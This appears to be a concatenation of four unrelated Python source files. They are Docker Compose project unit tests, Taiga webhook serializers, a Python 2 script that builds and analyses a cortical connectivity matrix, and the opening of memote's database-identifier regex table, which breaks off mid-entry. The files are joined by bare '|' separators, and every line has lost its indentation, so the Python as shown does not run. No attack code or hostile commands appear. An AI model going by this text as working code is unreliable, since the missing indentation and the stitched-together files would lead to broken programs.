from compose.const import LABEL_SERVICE
from compose.container import Container
from compose.project import Project
from compose.service import ContainerNet
from compose.service import Net
from compose.service import Service
class ProjectTest(unittest.TestCase):
def setUp(self):
self.mock_client = mock.create_autospec(docker.Client)
def test_from_dict(self):
project = Project.from_config('composetest', Config(None, [
{
'name': 'web',
'image': 'busybox:latest'
},
{
'name': 'db',
'image': 'busybox:latest'
},
], None), None)
self.assertEqual(len(project.services), 2)
self.assertEqual(project.get_service('web').name, 'web')
self.assertEqual(project.get_service('web').options['image'], 'busybox:latest')
self.assertEqual(project.get_service('db').name, 'db')
self.assertEqual(project.get_service('db').options['image'], 'busybox:latest')
def test_from_config(self):
dicts = Config(None, [
{
'name': 'web',
'image': 'busybox:latest',
},
{
'name': 'db',
'image': 'busybox:latest',
},
], None)
project = Project.from_config('composetest', dicts, None)
self.assertEqual(len(project.services), 2)
self.assertEqual(project.get_service('web').name, 'web')
self.assertEqual(project.get_service('web').options['image'], 'busybox:latest')
self.assertEqual(project.get_service('db').name, 'db')
self.assertEqual(project.get_service('db').options['image'], 'busybox:latest')
def test_get_service(self):
web = Service(
project='composetest',
name='web',
client=None,
image="busybox:latest",
)
project = Project('test', [web], None)
self.assertEqual(project.get_service('web'), web)
def test_get_services_returns_all_services_without_args(self):
web = Service(
project='composetest',
name='web',
image='foo',
)
console = Service(
project='composetest',
name='console',
image='foo',
)
project = Project('test', [web, console], None)
self.assertEqual(project.get_services(), [web, console])
def test_get_services_returns_listed_services_with_args(self):
web = Service(
project='composetest',
name='web',
image='foo',
)
console = Service(
project='composetest',
name='console',
image='foo',
)
project = Project('test', [web, console], None)
self.assertEqual(project.get_services(['console']), [console])
def test_get_services_with_include_links(self):
db = Service(
project='composetest',
name='db',
image='foo',
)
web = Service(
project='composetest',
name='web',
image='foo',
links=[(db, 'database')]
)
cache = Service(
project='composetest',
name='cache',
image='foo'
)
console = Service(
project='composetest',
name='console',
image='foo',
links=[(web, 'web')]
)
project = Project('test', [web, db, cache, console], None)
self.assertEqual(
project.get_services(['console'], include_deps=True),
[db, web, console]
)
def test_get_services_removes_duplicates_following_links(self):
db = Service(
project='composetest',
name='db',
image='foo',
)
web = Service(
project='composetest',
name='web',
image='foo',
links=[(db, 'database')]
)
project = Project('test', [web, db], None)
self.assertEqual(
project.get_services(['web', 'db'], include_deps=True),
[db, web]
)
def test_use_volumes_from_container(self):
container_id = 'aabbccddee'
container_dict = dict(Name='aaa', Id=container_id)
self.mock_client.inspect_container.return_value = container_dict
project = Project.from_config('test', Config(None, [
{
'name': 'test',
'image': 'busybox:latest',
'volumes_from': [VolumeFromSpec('aaa', 'rw')]
}
], None), self.mock_client)
self.assertEqual(project.get_service('test')._get_volumes_from(), [container_id + ":rw"])
def test_use_volumes_from_service_no_container(self):
container_name = 'test_vol_1'
self.mock_client.containers.return_value = [
{
"Name": container_name,
"Names": [container_name],
"Id": container_name,
"Image": 'busybox:latest'
}
]
project = Project.from_config('test', Config(None, [
{
'name': 'vol',
'image': 'busybox:latest'
},
{
'name': 'test',
'image': 'busybox:latest',
'volumes_from': [VolumeFromSpec('vol', 'rw')]
}
], None), self.mock_client)
self.assertEqual(project.get_service('test')._get_volumes_from(), [container_name + ":rw"])
def test_use_volumes_from_service_container(self):
container_ids = ['aabbccddee', '12345']
project = Project.from_config('test', Config(None, [
{
'name': 'vol',
'image': 'busybox:latest'
},
{
'name': 'test',
'image': 'busybox:latest',
'volumes_from': [VolumeFromSpec('vol', 'rw')]
}
], None), None)
with mock.patch.object(Service, 'containers') as mock_return:
mock_return.return_value = [
mock.Mock(id=container_id, spec=Container)
for container_id in container_ids]
self.assertEqual(
project.get_service('test')._get_volumes_from(),
[container_ids[0] + ':rw'])
def test_events(self):
services = [Service(name='web'), Service(name='db')]
project = Project('test', services, self.mock_client)
self.mock_client.events.return_value = iter([
{
'status': 'create',
'from': 'example/image',
'id': 'abcde',
'time': 1420092061,
'timeNano': 14200920610000002000,
},
{
'status': 'attach',
'from': 'example/image',
'id': 'abcde',
'time': 1420092061,
'timeNano': 14200920610000003000,
},
{
'status': 'create',
'from': 'example/other',
'id': 'bdbdbd',
'time': 1420092061,
'timeNano': 14200920610000005000,
},
{
'status': 'create',
'from': 'example/db',
'id': 'ababa',
'time': 1420092061,
'timeNano': 14200920610000004000,
},
])
def dt_with_microseconds(dt, us):
return datetime.datetime.fromtimestamp(dt).replace(microsecond=us)
def get_container(cid):
if cid == 'abcde':
name = 'web'
labels = {LABEL_SERVICE: name}
elif cid == 'ababa':
name = 'db'
labels = {LABEL_SERVICE: name}
else:
labels = {}
name = ''
return {
'Id': cid,
'Config': {'Labels': labels},
'Name': '/project_%s_1' % name,
}
self.mock_client.inspect_container.side_effect = get_container
events = project.events()
events_list = list(events)
# Assert the return value is a generator
assert not list(events)
assert events_list == [
{
'type': 'container',
'service': 'web',
'action': 'create',
'id': 'abcde',
'attributes': {
'name': 'project_web_1',
'image': 'example/image',
},
'time': dt_with_microseconds(1420092061, 2),
},
{
'type': 'container',
'service': 'web',
'action': 'attach',
'id': 'abcde',
'attributes': {
'name': 'project_web_1',
'image': 'example/image',
},
'time': dt_with_microseconds(1420092061, 3),
},
{
'type': 'container',
'service': 'db',
'action': 'create',
'id': 'ababa',
'attributes': {
'name': 'project_db_1',
'image': 'example/db',
},
'time': dt_with_microseconds(1420092061, 4),
},
]
def test_net_unset(self):
project = Project.from_config('test', Config(None, [
{
'name': 'test',
'image': 'busybox:latest',
}
], None), self.mock_client)
service = project.get_service('test')
self.assertEqual(service.net.id, None)
self.assertNotIn('NetworkMode', service._get_container_host_config({}))
def test_use_net_from_container(self):
container_id = 'aabbccddee'
container_dict = dict(Name='aaa', Id=container_id)
self.mock_client.inspect_container.return_value = container_dict
project = Project.from_config('test', Config(None, [
{
'name': 'test',
'image': 'busybox:latest',
'net': 'container:aaa'
}
], None), self.mock_client)
service = project.get_service('test')
self.assertEqual(service.net.mode, 'container:' + container_id)
def test_use_net_from_service(self):
container_name = 'test_aaa_1'
self.mock_client.containers.return_value = [
{
"Name": container_name,
"Names": [container_name],
"Id": container_name,
"Image": 'busybox:latest'
}
]
project = Project.from_config('test', Config(None, [
{
'name': 'aaa',
'image': 'busybox:latest'
},
{
'name': 'test',
'image': 'busybox:latest',
'net': 'container:aaa'
}
], None), self.mock_client)
service = project.get_service('test')
self.assertEqual(service.net.mode, 'container:' + container_name)
def test_uses_default_network_true(self):
web = Service('web', project='test', image="alpine", net=Net('test'))
db = Service('web', project='test', image="alpine", net=Net('other'))
project = Project('test', [web, db], None)
assert project.uses_default_network()
def test_uses_default_network_custom_name(self):
web = Service('web', project='test', image="alpine", net=Net('other'))
project = Project('test', [web], None)
assert not project.uses_default_network()
def test_uses_default_network_host(self):
web = Service('web', project='test', image="alpine", net=Net('host'))
project = Project('test', [web], None)
assert not project.uses_default_network()
def test_uses_default_network_container(self):
container = mock.Mock(id='test')
web = Service(
'web',
project='test',
image="alpine",
net=ContainerNet(container))
project = Project('test', [web], None)
assert not project.uses_default_network()
def test_container_without_name(self):
self.mock_client.containers.return_value = [
{'Image': 'busybox:latest', 'Id': '1', 'Name': '1'},
{'Image': 'busybox:latest', 'Id': '2', 'Name': None},
{'Image': 'busybox:latest', 'Id': '3'},
]
self.mock_client.inspect_container.return_value = {
'Id': '1',
'Config': {
'Labels': {
LABEL_SERVICE: 'web',
},
},
}
project = Project.from_config(
'test',
Config(None, [{
'name': 'web',
'image': 'busybox:latest',
}], None),
self.mock_client,
)
self.assertEqual([c.id for c in project.containers()], ['1'])
|
# -*- coding: utf-8 -*-
# Copyright (C) 2014-present Taiga Agile LLC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.core.exceptions import ObjectDoesNotExist
from taiga.base.api import serializers
from taiga.base.fields import Field, MethodField
from taiga.front.templatetags.functions import resolve as resolve_front_url
from taiga.projects.services import get_logo_big_thumbnail_url
from taiga.users.services import get_user_photo_url
from taiga.users.gravatar import get_user_gravatar_id
########################################################################
# WebHooks
########################################################################
class WebhookSerializer(serializers.LightSerializer):
id = Field()
project = Field(attr="project_id")
name = Field()
url = Field()
key = Field()
logs_counter = MethodField()
def get_logs_counter(self, obj):
return obj.logs.count()
class WebhookLogSerializer(serializers.LightSerializer):
id = Field()
webhook = Field(attr="webhook_id")
url = Field()
status = Field()
request_data = Field()
request_headers = Field()
response_data = Field()
response_headers = Field()
duration = Field()
created = Field()
########################################################################
# User
########################################################################
class UserSerializer(serializers.LightSerializer):
id = Field(attr="pk")
permalink = MethodField()
username = MethodField()
full_name = MethodField()
photo = MethodField()
gravatar_id = MethodField()
def get_permalink(self, obj):
return resolve_front_url("user", obj.username)
def get_username(self, obj):
return obj.get_username()
def get_full_name(self, obj):
return obj.get_full_name()
def get_photo(self, obj):
return get_user_photo_url(obj)
def get_gravatar_id(self, obj):
return get_user_gravatar_id(obj)
def to_value(self, instance):
if instance is None:
return None
return super().to_value(instance)
########################################################################
# Project
########################################################################
class ProjectSerializer(serializers.LightSerializer):
id = Field(attr="pk")
permalink = MethodField()
name = MethodField()
logo_big_url = MethodField()
def get_permalink(self, obj):
return resolve_front_url("project", obj.slug)
def get_name(self, obj):
return obj.name
def get_logo_big_url(self, obj):
return get_logo_big_thumbnail_url(obj)
########################################################################
# History Serializer
########################################################################
class HistoryDiffField(Field):
def to_value(self, value):
# Tip: 'value' is the object returned by
# taiga.projects.history.models.HistoryEntry.values_diff()
ret = {}
for key, val in value.items():
if key in ["attachments", "custom_attributes", "description_diff"]:
ret[key] = val
elif key == "points":
ret[key] = {k: {"from": v[0], "to": v[1]} for k, v in val.items()}
else:
ret[key] = {"from": val[0], "to": val[1]}
return ret
class HistoryEntrySerializer(serializers.LightSerializer):
comment = Field()
comment_html = Field()
delete_comment_date = Field()
comment_versions = Field()
edit_comment_date = Field()
diff = HistoryDiffField(attr="values_diff")
########################################################################
# _Misc_
########################################################################
class CustomAttributesValuesWebhookSerializerMixin(serializers.LightSerializer):
custom_attributes_values = MethodField()
def custom_attributes_queryset(self, project):
raise NotImplementedError()
def get_custom_attributes_values(self, obj):
def _use_name_instead_id_as_key_in_custom_attributes_values(custom_attributes, values):
ret = {}
for attr in custom_attributes:
value = values.get(str(attr["id"]), None)
if value is not None:
ret[attr["name"]] = value
return ret
try:
values = obj.custom_attributes_values.attributes_values
custom_attributes = self.custom_attributes_queryset(obj.project).values('id', 'name')
return _use_name_instead_id_as_key_in_custom_attributes_values(custom_attributes, values)
except ObjectDoesNotExist:
return None
class RolePointsSerializer(serializers.LightSerializer):
role = MethodField()
name = MethodField()
value = MethodField()
def get_role(self, obj):
return obj.role.name
def get_name(self, obj):
return obj.points.name
def get_value(self, obj):
return obj.points.value
class EpicStatusSerializer(serializers.LightSerializer):
id = Field(attr="pk")
name = MethodField()
slug = MethodField()
color = MethodField()
is_closed = MethodField()
def get_name(self, obj):
return obj.name
def get_slug(self, obj):
return obj.slug
def get_color(self, obj):
return obj.color
def get_is_closed(self, obj):
return obj.is_closed
class UserStoryStatusSerializer(serializers.LightSerializer):
id = Field(attr="pk")
name = MethodField()
slug = MethodField()
color = MethodField()
is_closed = MethodField()
is_archived = MethodField()
def get_name(self, obj):
return obj.name
def get_slug(self, obj):
return obj.slug
def get_color(self, obj):
return obj.color
def get_is_closed(self, obj):
return obj.is_closed
def get_is_archived(self, obj):
return obj.is_archived
class TaskStatusSerializer(serializers.LightSerializer):
id = Field(attr="pk")
name = MethodField()
slug = MethodField()
color = MethodField()
is_closed = MethodField()
def get_name(self, obj):
return obj.name
def get_slug(self, obj):
return obj.slug
def get_color(self, obj):
return obj.color
def get_is_closed(self, obj):
return obj.is_closed
class IssueStatusSerializer(serializers.LightSerializer):
id = Field(attr="pk")
name = MethodField()
slug = MethodField()
color = MethodField()
is_closed = MethodField()
def get_name(self, obj):
return obj.name
def get_slug(self, obj):
return obj.slug
def get_color(self, obj):
return obj.color
def get_is_closed(self, obj):
return obj.is_closed
class IssueTypeSerializer(serializers.LightSerializer):
id = Field(attr="pk")
name = MethodField()
color = MethodField()
def get_name(self, obj):
return obj.name
def get_color(self, obj):
return obj.color
class PrioritySerializer(serializers.LightSerializer):
id = Field(attr="pk")
name = MethodField()
color = MethodField()
def get_name(self, obj):
return obj.name
def get_color(self, obj):
return obj.color
class SeveritySerializer(serializers.LightSerializer):
id = Field(attr="pk")
name = MethodField()
color = MethodField()
def get_name(self, obj):
return obj.name
def get_color(self, obj):
return obj.color
########################################################################
# Milestone
########################################################################
class MilestoneSerializer(serializers.LightSerializer):
id = Field()
name = Field()
slug = Field()
estimated_start = Field()
estimated_finish = Field()
created_date = Field()
modified_date = Field()
closed = Field()
disponibility = Field()
permalink = MethodField()
project = ProjectSerializer()
owner = UserSerializer()
def get_permalink(self, obj):
return resolve_front_url("taskboard", obj.project.slug, obj.slug)
def to_value(self, instance):
if instance is None:
return None
return super().to_value(instance)
########################################################################
# User Story
########################################################################
class UserStorySerializer(CustomAttributesValuesWebhookSerializerMixin, serializers.LightSerializer):
id = Field()
ref = Field()
project = ProjectSerializer()
is_closed = Field()
created_date = Field()
modified_date = Field()
finish_date = Field()
due_date = Field()
due_date_reason = Field()
subject = Field()
client_requirement = Field()
team_requirement = Field()
generated_from_issue = Field(attr="generated_from_issue_id")
generated_from_task = Field(attr="generated_from_task_id")
from_task_ref = Field()
external_reference = Field()
tribe_gig = Field()
watchers = MethodField()
is_blocked = Field()
blocked_note = Field()
description = Field()
tags = Field()
permalink = MethodField()
owner = UserSerializer()
assigned_to = UserSerializer()
assigned_users = MethodField()
points = MethodField()
status = UserStoryStatusSerializer()
milestone = MilestoneSerializer()
def get_permalink(self, obj):
return resolve_front_url("userstory", obj.project.slug, obj.ref)
def custom_attributes_queryset(self, project):
return project.userstorycustomattributes.all()
def get_assigned_users(self, obj):
"""Get the assigned of an object.
:return: User queryset object representing the assigned users
"""
return [user.id for user in obj.assigned_users.all()]
def get_watchers(self, obj):
return list(obj.get_watchers().values_list("id", flat=True))
def get_points(self, obj):
return RolePointsSerializer(obj.role_points.all(), many=True).data
########################################################################
# Task
########################################################################
class TaskSerializer(CustomAttributesValuesWebhookSerializerMixin, serializers.LightSerializer):
id = Field()
ref = Field()
created_date = Field()
modified_date = Field()
finished_date = Field()
due_date = Field()
due_date_reason = Field()
subject = Field()
us_order = Field()
taskboard_order = Field()
is_iocaine = Field()
external_reference = Field()
watchers = MethodField()
is_blocked = Field()
blocked_note = Field()
description = Field()
tags = Field()
permalink = MethodField()
project = ProjectSerializer()
owner = UserSerializer()
assigned_to = UserSerializer()
status = TaskStatusSerializer()
user_story = UserStorySerializer()
milestone = MilestoneSerializer()
promoted_to = MethodField()
def get_permalink(self, obj):
return resolve_front_url("task", obj.project.slug, obj.ref)
def custom_attributes_queryset(self, project):
return project.taskcustomattributes.all()
def get_watchers(self, obj):
return list(obj.get_watchers().values_list("id", flat=True))
def get_promoted_to(self, obj):
return list(obj.generated_user_stories.values_list("id", flat=True))
########################################################################
# Issue
########################################################################
class IssueSerializer(CustomAttributesValuesWebhookSerializerMixin, serializers.LightSerializer):
id = Field()
ref = Field()
created_date = Field()
modified_date = Field()
finished_date = Field()
due_date = Field()
due_date_reason = Field()
subject = Field()
external_reference = Field()
watchers = MethodField()
description = Field()
tags = Field()
permalink = MethodField()
project = ProjectSerializer()
milestone = MilestoneSerializer()
owner = UserSerializer()
assigned_to = UserSerializer()
status = IssueStatusSerializer()
type = IssueTypeSerializer()
priority = PrioritySerializer()
severity = SeveritySerializer()
promoted_to = MethodField()
def get_permalink(self, obj):
return resolve_front_url("issue", obj.project.slug, obj.ref)
def custom_attributes_queryset(self, project):
return project.issuecustomattributes.all()
def get_watchers(self, obj):
return list(obj.get_watchers().values_list("id", flat=True))
def get_promoted_to(self, obj):
return list(obj.generated_user_stories.values_list("id", flat=True))
########################################################################
# Wiki Page
########################################################################
class WikiPageSerializer(serializers.LightSerializer):
id = Field()
slug = Field()
content = Field()
created_date = Field()
modified_date = Field()
permalink = MethodField()
project = ProjectSerializer()
owner = UserSerializer()
last_modifier = UserSerializer()
def get_permalink(self, obj):
return resolve_front_url("wiki", obj.project.slug, obj.slug)
########################################################################
# Epic
########################################################################
class EpicSerializer(CustomAttributesValuesWebhookSerializerMixin, serializers.LightSerializer):
id = Field()
ref = Field()
created_date = Field()
modified_date = Field()
subject = Field()
watchers = MethodField()
description = Field()
tags = Field()
permalink = MethodField()
project = ProjectSerializer()
owner = UserSerializer()
assigned_to = UserSerializer()
status = EpicStatusSerializer()
epics_order = Field()
color = Field()
client_requirement = Field()
team_requirement = Field()
client_requirement = Field()
team_requirement = Field()
def get_permalink(self, obj):
return resolve_front_url("epic", obj.project.slug, obj.ref)
def custom_attributes_queryset(self, project):
return project.epiccustomattributes.all()
def get_watchers(self, obj):
return list(obj.get_watchers().values_list("id", flat=True))
class EpicRelatedUserStorySerializer(serializers.LightSerializer):
id = Field()
user_story = MethodField()
epic = MethodField()
order = Field()
def get_user_story(self, obj):
return UserStorySerializer(obj.user_story).data
def get_epic(self, obj):
return EpicSerializer(obj.epic).data
|
import numpy as np
from scipy import linalg as la
import time
import params110 as pm
start_time = time.time()
print "Initializing and creating connection matrix..."
conn_matrix = np.zeros((pm.nrns,pm.nrns))
#pbar.start()
count23,count4,count5,countA,countB,countAz,countQ,countW = 0,0,0,0,0,0,0,0
for i in range(pm.nrns):
for j in range(pm.nrns):
if pm.same_minicolumn(i,j):
if i in pm.layers23 and j in pm.layers23:
if pm.both_exc(i,j):
conn_matrix[j][i]= pm.flip(0.26,i)
count23 = pm.check_count(count23, conn_matrix[j][i])
elif pm.both_inh(i,j):
conn_matrix[j][i]= pm.flip(0.25,i)
count23 = pm.check_count(count23, conn_matrix[j][i])
elif i in pm.exc_nrns_set and j in pm.inh_nrns_set:
conn_matrix[j][i]= pm.flip(0.21,i)
count23 = pm.check_count(count23, conn_matrix[j][i])
else:
conn_matrix[j][i]= pm.flip(0.16,i)
count23 = pm.check_count(count23, conn_matrix[j][i])
# LAYER 4
elif i in pm.layers4 and j in pm.layers4:
if pm.both_exc(i,j):
conn_matrix[j][i]= pm.flip(0.17,i)
count4 = pm.check_count(count4, conn_matrix[j][i])
elif pm.both_inh(i,j):
conn_matrix[j][i]= pm.flip(0.50,i)
count4 = pm.check_count(count4, conn_matrix[j][i])
elif i in pm.exc_nrns_set and j in pm.inh_nrns_set:
conn_matrix[j][i]= pm.flip(0.19,i)
count4 = pm.check_count(count4, conn_matrix[j][i])
else:
conn_matrix[j][i]= pm.flip(0.10,i)
count4 = pm.check_count(count4, conn_matrix[j][i])
# LAYER 5
elif i in pm.layers5 and j in pm.layers5:
if pm.both_exc(i,j):
conn_matrix[j][i]= pm.flip(0.09,i)
count5 = pm.check_count(count5, conn_matrix[j][i])
elif pm.both_inh(i,j):
conn_matrix[j][i]= pm.flip(0.60,i)
count5 = pm.check_count(count5, conn_matrix[j][i])
elif i in pm.exc_nrns_set and j in pm.inh_nrns_set:
conn_matrix[j][i]= pm.flip(0.10,i)
count5 = pm.check_count(count5, conn_matrix[j][i])
else:
conn_matrix[j][i]= pm.flip(0.12,i)
count5 = pm.check_count(count5, conn_matrix[j][i])
# FROM LAYER4 -> LAYER2/3
elif i in pm.layers4 and j in pm.layers23:
if pm.both_exc(i,j):
conn_matrix[j][i]= pm.flip(0.28,i)
countA = pm.check_count(countA, conn_matrix[j][i])
elif pm.both_inh(i,j):
conn_matrix[j][i]= pm.flip(0.20,i)
countA = pm.check_count(countA, conn_matrix[j][i])
elif i in pm.exc_nrns_set and j in pm.inh_nrns_set:
conn_matrix[j][i]= pm.flip(0.10,i)
countA = pm.check_count(countA, conn_matrix[j][i])
else:
conn_matrix[j][i]= pm.flip(0.50,i)
countA = pm.check_count(countA, conn_matrix[j][i])
# FROM LAYER2/3 -> LAYER5
elif i in pm.layers23 and j in pm.layers5:
if pm.both_exc(i,j):
conn_matrix[j][i]= pm.flip(0.55,i)
countB = pm.check_count(countB, conn_matrix[j][i])
elif pm.both_inh(i,j):
conn_matrix[j][i]= pm.flip(0.0001,i)
countB = pm.check_count(countB, conn_matrix[j][i])
elif i in pm.exc_nrns_set and j in pm.inh_nrns_set:
conn_matrix[j][i]= pm.flip(0.001,i)
countB = pm.check_count(countB, conn_matrix[j][i])
else:
conn_matrix[j][i]= pm.flip(0.20,i)
countB = pm.check_count(countB, conn_matrix[j][i])
#:::
elif not pm.same_minicolumn(i,j):
conn_matrix[j][i] = pm.flip(0.102,i)
countQ = pm.check_count(countQ,conn_matrix[j][i])
print ("Matrix Created in %.5s seconds." % (time.time() - start_time))
#_________________________________________________________________________________________
#"""
print "connections 2/3 = ", count23
print "connections 4 = ", count4
print "connections 5 = ", count5
print "not same minicolumn, same hypercolumn = ",countQ
print "not same hypercolumn = ",countAz
print "connections 30%", count23+count4+count5+countQ
print "connections 70%", countAz
#"""
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
k=[]
for i in range(pm.nrns):
if np.sum(conn_matrix[i,:]) > 1e-5:
k.append(i)
print "Row sums not zero", len(k)
pm.balanceN(conn_matrix)
#for i in range(len(k)):
# balance(conn_matrix[k[i],:])
#"""
delta =0
for i in range(pm.nrns):
if np.sum(conn_matrix[i,:]) > 1e-5:
delta+=1
#print np.sum(conn_matrix[i,:])
#print i
print "sum of all matrix",np.sum(conn_matrix)
print "Row sums not to zero after balance",delta
g = 0
for i in range(pm.nrns):
for j in range(pm.nrns):
if abs(conn_matrix[j][i]) > 1e-4:
g+=1
print "total connections: ", g
print "% connections within a minicolumn= ", round((count23+count4+count5+countA+countB)/float(g)*100.)
print "% connections outside a minicolumn= ", round(float(float(countQ)/float(g))*100.)
print
h,z=0,0
for i in range(pm.nrns):
if i in pm.exc_nrns_set:
for j in conn_matrix[:,i]:
if j < 0:
h+=1
if i in pm.inh_nrns_set:
for j in conn_matrix[:,i]:
if j > 0:
z+=1
print h,"negatives in exc"
print z,"positives in inh"
gh = 0
for i in conn_matrix[1][:]:
if i < -1e-4 or i > 1e-4:
gh+=1
print gh
#"""
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#"""
ee = la.eigvals(conn_matrix)
conn_matrix.dump("110.dat")
print "done"
"""
xl = np.linspace(-30,30,61)
yl = np.linspace(-30,30,61)
con_density = np.zeros((len(xl),len(yl)))
st = []
for i in range(len(trials)):
ee = trials[i]
for ii in range(len(ee)):
xid = plt.find(xl>=ee[ii].imag)[0]
yid = plt.find(yl>=ee[ii].real)[0]
con_density[xid,yid] = con_density[xid,yid]+1
st.append(con_density)
for i in st:
pcolor(i)
colorbar()
#con_density = con_density#/len(ee)
pcolor(con_density)
print ("Matrix Created in %.5s seconds." % (time.time() - start_time))
print str(100.-(len(plt.find(abs(ee) > 15))/float(len(ee)) *100.))+" of the eigenvalues are in the 15 radius circle"
print "two largest eigenvalues by magnitude %.5s, " % abs(ee)[0]+"%.5s " %abs(ee)[1]
print "Loading plot..."
plt.figure(1)
#plt.subplot(1,2,1)
hist5,xedges,yedges = np.histogram2d(ee.real,ee.imag,bins=30,normed=False)
extent = [-20, 20, -20, 20 ]
plt.imshow(hist5.T,extent=extent,interpolation='nearest',origin='lower')
#plt.colorbar()
#plt.show()
ed = np.linspace(-4.,1,1e3)
hh,ed= np.histogram(conn_matrix.flatten(),ed)
tt = np.linspace(np.pi,-np.pi,1e2)
sx = np.sin(tt)
sy = np.cos(tt)
ed_ev = np.linspace(-20,20,1e2)
hh_real,ed1 = np.histogram(ee.real,ed_ev)
hh_imag,ed1 = np.histogram(ee.imag,ed_ev)
#plt.clf()
#plt.subplot(1,2,2)
plt.scatter(ee.real,ee.imag)
plt.plot(sx,sy,'r')
plt.plot(15*sx,15*sy,'g')
#plt.pcolor(conn_matrix, cmap=plt.cm.Blues)
plt.title("%.8s variance," % pm.sigma**2 +str(pm.mu)+" mean")
#plt.axis('equal')
plt.xlim(min(ed_ev),max(ed_ev))
plt.ylim(min(ed_ev),max(ed_ev))
plt.show()
noB_var_row = np.var(conn_matrix,1)
noB_var_col = np.var(conn_matrix,0)
B_var_row = np.var(conn_matrix,1)
B_var_col = np.var(conn_matrix,0)
plt.subplot(3,2,2)
plt.plot(hh_imag,ed_ev[0:-1])
plt.ylim(min(ed_ev),max(ed_ev))
#plt.ylim(0,100)
plt.xlabel("max ee.real %.5s" % np.max(ee.real) + " max ee.imag %.5s" %np.max(ee.imag))
plt.subplot(3,2,3)
plt.plot(ed_ev[0:-1],hh_real)
plt.xlim(min(ed_ev),max(ed_ev))
plt.subplot(3,2,4)
#plt.plot(noB_var_row)#, cmap=plt.cm.RdYlBu)
#plt.plot(noB_var_col)#, cmap=plt.cm.RdYlBu)
#plt.plot(B_var_row)#, cmap=plt.cm.RdYlBu)
plt.plot(B_var_col)#, cmap=plt.cm.RdYlBu)
plt.subplot(3,2,5)
plt.pcolor(conn_matrix)#, cmap=plt.cm.RdYlBu)
plt.subplot(3,2,6)
plt.plot(ed[0:-1],hh)
#plt.ylim(0,800)
plt.show()
#"""
|
# -*- coding: utf-8 -*-
# Copyright 2017 Novo Nordisk Foundation Center for Biosustainability,
# Technical University of Denmark.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Supporting functions for annotation checks performed on the model object."""
from __future__ import absolute_import
import logging
import re
from collections import OrderedDict
import pandas as pd
from future.utils import native_str
LOGGER = logging.getLogger(__name__)
# MIRIAM (http://www.ebi.ac.uk/miriam/) styled identifiers for
# common databases that are currently included are:
# DB gen,rxn,met url
#
# 'MetaNetX' ['rxn','met'] 'http://www.metanetx.org'
# 'Kegg' ['gen','rxn','met'] 'http://www.kegg.jp/'
# 'SEED' ['met'] 'http://modelseed.org/'
#
# 'InChI' ['met'] 'https://www.ebi.ac.uk/chebi/'
# 'InChIKey' ['met'] 'http://cactus.nci.nih.gov/chemical/structure'
# 'ChEBI' ['met'] 'http://bioportal.bioontology.org/ontologies/CHEBI'
# 'BRENDA' ['rxn'] 'http://www.brenda-enzymes.org/'
# 'RHEA' ['rxn'] 'http://www.rhea-db.org/'
# 'HMDB' ['met'] 'http://www.hmdb.ca/'
#
# 'BioCyc' ['rxn','met'] 'http://biocyc.org'
# 'Reactome' ['rxn','met'] 'http://www.reactome.org/'
# 'BiGG' ['rxn','met'] 'http://bigg.ucsd.edu/universal/'
# 'PubChem' ['met'] 'https://pubchem.ncbi.nlm.nih.gov/'
# 'RefSeq' ['gen'] 'http://www.ncbi.nlm.nih.gov/projects/RefSeq/'
# 'Uniprot' ['gen'] 'http://www.uniprot.org/'
# 'EC-Code' ['rxn'] 'http://www.enzyme-database.org/'
# 'EcoGene' ['gen'] 'http://ecogene.org/'
# 'NCBI GI' ['gen'] 'http://www.ncbi.nlm.nih.gov/protein/'
# 'NCBI Gene' ['gen'] 'http://ncbigene.bio2rdf.org/fct'
# 'NCBI Protein'['gen'] 'http://www.ncbi.nlm.nih.gov/protein'
# 'CCDS' ['gen'] 'http://www.ncbi.nlm.nih.gov/CCDS/'
# 'HPRD' ['gen'] 'http://www.hprd.org/'
# 'ASAP' ['gen'] 'http://asap.ahabs.wisc.edu/asap/home.php'
GENE_PRODUCT_ANNOTATIONS = OrderedDict(
[
(
"refseq",
re.compile(
r"^((AC|AP|NC|NG|NM|NP|NR|NT|"
r"NW|XM|XP|XR|YP|ZP)_\d+|"
r"(NZ\_[A-Z]{4}\d+))(\.\d+)?$"
),
),
(
"uniprot",
re.compile(
r"^([A-N,R-Z][0-9]([A-Z][A-Z, 0-9]"
r"[A-Z, 0-9][0-9]){1,2})|([O,P,Q]"
r"[0-9][A-Z, 0-9][A-Z, 0-9][A-Z, 0-9]"
r"[0-9])(\.\d+)?$"
),
),
("ecogene", re.compile(r"^EG\d+$")),
("kegg.genes", re.compile(r"^\w+:[\w\d\.-]*$")),
("ncbigi", re.compile(r"^(GI|gi)\:\d+$")),
("ncbigene", re.compile(r"^\d+$")),
("ncbiprotein", re.compile(r"^(\w+\d+(\.\d+)?)|(NP_\d+)$")),
("ccds", re.compile(r"^CCDS\d+\.\d+$")),
("hprd", re.compile(r"^\d+$")),
("asap", re.compile(r"^[A-Za-z0-9-]+$")),
]
)
REACTION_ANNOTATIONS = OrderedDict(
[
("rhea", re.compile(r"^\d{5}$")),
("kegg.reaction", re.compile(r"^R\d+$")),
("seed.reaction", re.compile(r"^rxn\d+$")),
("metanetx.reaction", re.compile(r"^MNXR\d+$")),
("bigg.reaction", re.compile(r"^[a-z_A-Z0-9]+$")),
(
"reactome",
re.compile(r"(^R-[A-Z]{3}-[0-9]+(-[0-9]+)?$)|(^REACT_\d+(\.\d+)?$)"),
),
(
"ec-code",
re.compile(
r"^\d+\.-\.-\.-|\d+\.\d+\.-\.-|"
r"\d+\.\d+\.\d+\.-|"
r"\d+\.\d+\.\d+\.(n)?\d+$"
),
),
(
"brenda",
